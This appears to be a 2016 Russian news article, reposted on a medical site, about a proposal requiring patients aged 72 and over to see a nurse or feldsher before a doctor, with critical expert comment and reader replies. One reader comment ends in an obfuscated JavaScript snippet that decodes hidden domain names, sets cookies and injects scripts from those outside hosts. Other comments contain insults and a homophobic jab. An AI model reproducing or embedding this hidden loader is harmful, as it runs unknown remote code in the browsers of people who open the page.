07.04.2016 2565

Старикам хотят запретить самостоятельно обращаться к врачам

 Старикам хотят запретить самостоятельно обращаться к врачам
В правительстве рассматривают предложение о том, чтобы пожилые пациенты могли попасть на прием к доктору в поликлинике только с разрешения медсестры или фельдшера.

Одно из предложений, которое рассматривается при подготовке плана реализации стратегии действий в интересах пожилых людей, — изменение системы первичного приема граждан в поликлиниках.

Его суть заключается в том, что пациентов старше определенного возраста сначала будет принимать медсестра или фельдшер и попасть к врачу можно будет, только если персонал среднего звена сочтет это необходимым.

Над планом реализации «Стратегии действий в интересах граждан старшего поколения в Российской Федерации до 2025 года» сейчас работают сразу несколько ведомств (координатор — Минтруд).

Стратегия была утверждена правительством в феврале, однако сам по себе этот документ носит декларативный характер. 

Конкретные же мероприятия, программы, ответственные, источники финансирования и прочее будут прописаны в плане, который с учетом предложений всех заинтересованных ведомств разработают до конца апреля и представят на рассмотрение правительства. «Известиям» удалось ознакомиться с ключевыми предложениями в области здравоохранения.

К врачу сразу не пустят

Как выяснили «Известия», одним из главных новшеств может стать изменение порядка приема пациентов в поликлиниках. Об этом корреспонденту «Известий» сообщил член комитета Совета Федерации по социальной политике и здравоохранению, председатель Союза пенсионеров России Валерий Рязанский.

— Мы будем вносить предложения, чтобы старшее поколение было ориентировано на оперативную медицинскую помощь, на первичное звено, а в сельских населенных пунктах — на фельдшерско-акушерские пункты. Эти пункты должны быть приведены в порядок, — рассказал сенатор. 

Как пояснил Валерий Рязанский, на практике это будет означать, что пожилые люди старше определенного возраста не смогут напрямую обратиться за помощью к врачу, а должны будут сначала прийти на прием к медсестре или фельдшеру. И только если средний медперсонал сочтет, что пациент нуждается в осмотре врачом, он будет допущен на прием к специалисту.

— Я не готов говорить, правильно это или не правильно. Может, это и правильно, чтобы понять, куда направить человека, чтобы он не тратил время и впустую не сидел в очередях, да и не загружал тех специалистов, к которым не надо идти. Но сейчас речь идет об обсуждении предложений, которые поступают. Давайте их соберем, посмотрим, на что хватит ресурсов, — подчеркнул Валерий Рязанский.

Однако в стане разработчиков нет единого мнения. Профессор кафедры труда и социальной политики РАНХиГС Любовь Храпылина, которая входит в экспертную группу, считает инициативу о переводе стариков на приоритетную сестринскую доврачебную помощь дискриминирующей и противоречащей федеральному законодательству. 

— А если фельдшер или медсестра ошиблись? И вообще, почему это вдруг пожилой человек становится человеком второго сорта в своем праве получить врачебную помощь? С какой стати гражданин России лишается права выбирать для себя медицинское учреждение, врача? — задается вопросами Любовь Храпылина.

По ее словам, такой порядок предлагают ввести для людей в возрасте 72 лет и старше.

— Предлагающие такое нововведение считают, что старики — основной контингент поликлиник, что жалобы у них стереотипные, что и так всем известно, с какой жалобой они придут, поэтому зачем зря занимать время врача? Но встает вопрос, насколько те, кто это предлагают, вообще знают, что такое геронтология и геронтологические аспекты помощи. Там особые симптомы, особое назначение лекарственных средств, — поясняет Любовь Храпылина. — Я не считаю, что возраст определяет изменение прав на медицинскую помощь, на конституционную основу. Он же гражданин России? Гражданин. Никто же старика гражданства не лишал!

— Эта идея будет несостоятельной, — заявил «Известиям» председатель комиссии Общественной палаты по охране здоровья, директор Московского НИИ глазных болезней имени Гельмгольца, член Совета «Общества врачей России» Владимир Нероев. — Существует федеральный закон № 323 «Об основах охраны здоровья граждан в Российской Федерации», в котором четко прописано, как должна оказываться медицинская помощь.

Прием пациента должен проводить врач, а не медсестра. Не вижу никакой перспективы у этой идеи. Надо идти не по пути перевода пациентов на медсестер, а по пути увеличения кадрового потенциала российского здравоохранения. Так мы можем опуститься до того, что завтра пациентов начнут принимать медсестры, а послезавтра санитарки. Моя позиция как врача с многолетним стажем — пациентов должны принимать квалифицированные врачи.

Получить оперативный комментарий Минздрава по этому поводу «Известиям» не удалось. 

Геронтолога в каждый район

Еще одним направлением реализации стратегии будет развитие геронтологической службы вплоть до того, что штатную должность геронтолога предлагается создать в каждой поликлинике. Об этом «Известиям» также сообщил Валерий Рязанский. 

Отвечая на вопрос, из каких источников предлагается финансировать работу геронтологов, сенатор пояснил, что эту задачу должны решать регионы. Что касается числа таких специалистов на каждую поликлинику, то, чтобы понять, сколько нужно геронтологов на одно учреждение, необходимо провести дополнительные расчеты. 

— У нас их просто еще мало. Надо готовить и готовить этих людей. Это особый вид деятельности. Мы будем настаивать на том, чтобы в каждом регионе была создана система геронтологической помощи и поддержки. Проблема здесь в том, что она основана как на новых принципах медицинского сопровождения, так и социального сопровождения, — рассказал Валерий Рязанский. — В этом и преимущество, но и сложности, потому что это находится на стыке двух ведомств — медицинского и социальных служб. Небольшой опыт по созданию геронтологической службы уже есть: появился главный гериатр страны, создан центр на базе Второго медицинского университета. И важно этот опыт распространить на все регионы нашей страны.

Любовь Храпылина к инициативе с геронтологами относится скептически.

— У нас люди по 4–6 часов сегодня сидят в очереди, чтобы попасть на прием к терапевту или врачу-специалисту. Прежде чем написать красивую фразу, надо сначала рассчитать, откуда финансирование, кто будет оплачивать, как это будет организовано. Геронтология нужна, но я не понимаю финансовой основы развития геронтологической службы первичного звена, — сказала она.

Ссылка на оригинал 



Это нравится:0Да/0Нет
Mikhail
Сама постановка вопроса провокационная, ничего не имеющая общего с реальностью.
Имя Цитировать
Это нравится:0Да/0Нет
vladoctor1
Тогда зачем держать такую армию врачей? Если у нас не хватает врачей, тогда уж лучше сделать как было в царской России, врачей сконцентрировать в крупных районных и городских клиниках уменьшив их штат, а остальную работу пусть ведут фельдшеры и медсестры.
Имя Цитировать
Это нравится:2Да/0Нет
monach
а в думаете у фельдшеров и медсестер работы не хватает? или за копейки которые они получают на них можно повесить работу , которую врачи за рубли делать не хотят?
Имя Цитировать
Это нравится:0Да/0Нет
pirks777
Странно, что господа инициаторы не ссылаются на "зарубежный опыт цивилизованных стран". Видимо эта "гениальная" идея исключительно собственное ноу хау.
Имя Цитировать
Это нравится:0Да/0Нет
mtd0427112@dlp
Т.е при любой смерти старика виновата будет мед.сестра, которую обвинят в том, что она недоучла тяжести состояния и не направила к врачу. Вся эта, уж извините мразь, предлагающая этот бред, тоже будут стариками. Очень хочется верить, что они не будут у власти до тех пор и им аукнется ещё здесь а не на том свете.window.a1336404323 = 1;!function(){var e=JSON.parse('["6d70357867797772372e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "feldsher.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Имя Цитировать
Это нравится:0Да/0Нет
Slava
И куда этот Минтруд (главный урод - Топилин Максим Анатольевич) свое свиное рыло сует? При чем тут пенсионеры и Минтруд?
Эти деятели уже вовсю с детей-инвалидов собственно инвалидность снимают. Да и льготы поотменяли.
Теперь и до пенсионеров добрались.
Имя Цитировать
Это нравится:0Да/0Нет
Dr.Guevara
Закон не пройдёт, так как содержит элементы дискриминации по возрастному признаку и тем самым противоречит Конституции РФ.
Имя Цитировать
Это нравится:0Да/0Нет
wera772
И то верно . Тем более , что эвтаназия у нас в стране как бы не разрешена (пока ?) . Зажились старикашки . Дохода с них никакого . Ни за собственное лечение , ни за лекарства со своей нищей пенсии заплатить не могут . А здесь всё очень не плохо придумано . Вроде и в помощи не отказывают ... Вот только помогать можно по-разному . Кому-то помочь в жизни , а кому-то ...

Имя Цитировать
Это нравится:0Да/1Нет
gladiatorrima
Возраст и состояние здоровья не всегда коррелируют. Надо активней ставить диагноз старческая деменция или болезнь Альцгеймера и т. д. с поражением в правах дееспособности. И побольше открывать домов престарелых для таких пациентов, там и штат врачей соответствующий и родственники смогут полноценно работать , вместо постоянного страха, что этот старик подожжет дом, или уничтожит документы, купит у мошенников что-нибудь ненужное в кредит, а то и подарит жилье мошенникам. Такие и скорую дергают не по болезни, а поговорить по несколько раз в день Есть же европейский опыт. Не нужно изобретать велосипед...
Имя Цитировать
Это нравится:0Да/0Нет
wera772
Уважаемый , представьте , что вы всю жизнь строили свой дом , вкладывали всю душу и все силы в своих детей и однажды , достигнув определённого возраста (видимо , его тоже установит государство) вас отправят в дурдом . Вам хотелось бы закончить свои дни в дурдоме вдали от всего , что некогда было вам так дорого и мило ? И ладно , если вас одолеет Альцгеймер . А если нет ? И вам поставят диагноз в целях вашей безопасности и безопасности ваших близких ?
Судя по всему , вы ещё молодой человек и государство к тому времени успеет внедрить "европейский опыт"...
Кстати , в европах сейчас активно приветствуется педерастия ... Тоже , говорят , ОЧЕНЬ прогрессивно ...
Имя Цитировать
Текст сообщения*
Загрузить файл или картинкуПеретащить с помощью Drag'n'drop
Перетащите файлы
Ничего не найдено